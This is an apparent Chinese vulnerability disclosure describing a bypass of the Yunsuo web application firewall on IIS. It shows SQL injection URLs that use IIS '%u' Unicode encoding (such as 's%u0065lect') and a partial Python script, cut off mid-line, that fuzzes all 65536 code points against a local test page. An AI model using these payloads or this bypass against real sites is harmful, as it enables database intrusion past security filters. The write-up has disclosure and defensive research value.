一个有意思的通用windows防火墙bypass(云锁为例)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 一个有意思的通用bypass ### 详细说明: 1:之前自己总结了一个帖子,内容上将waf bypass分了几个层面,其中有一个层面是web服务器层面,记得在内容上提到了iis服务器的一些trick 2:IIS在对%u0011形式的内容的时候,是可以解析的,例如我的url为: ``` http://192.168.15.130/letmetest.asp?t=152522098 and(select top 1 eventname_en from eventshelp)>0 ``` 我将url编码为: ``` http://192.168.15.130/letmetest.asp?t=152522098 and(s%u0065lect top 1 eventname_en from eventshelp)>0 ``` s%u0065lect的形式的时候也会被iis解析为select 3:于是我先在本地搭建了一个云锁的环境,iis版本,本机使用了windows2003的环境, 并且创建了一个有漏洞的页面http://192.168.15.130/letmetest.asp 4:我先用以上方式去访问 %u0065的方式,此时发现云锁此种情况过滤了. 5:此时正题来了, 奇葩的想法是这里应该%uxxxx可以填写65535次个字符,会不会有不同国家的编码select对应解析出来成为ascii的select阿![事后发现是多傻吊的想法] 6:自己写了个代码: ``` import httplib import re url = '192.168.15.130' payload = '/letmetest.asp?t=152522098/**/%u00aand(s%u' for i in range(65536): result = hex(i).replace('0x','') if len(result)<4: c = 4-len(result) b = '0'*c zz = b + hex(i).replace('0x','') else: zz = hex(i).replace('0x','') test = '%slect/**/count(*)/**/from/**/eventshelp)>0' % zz conn =...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息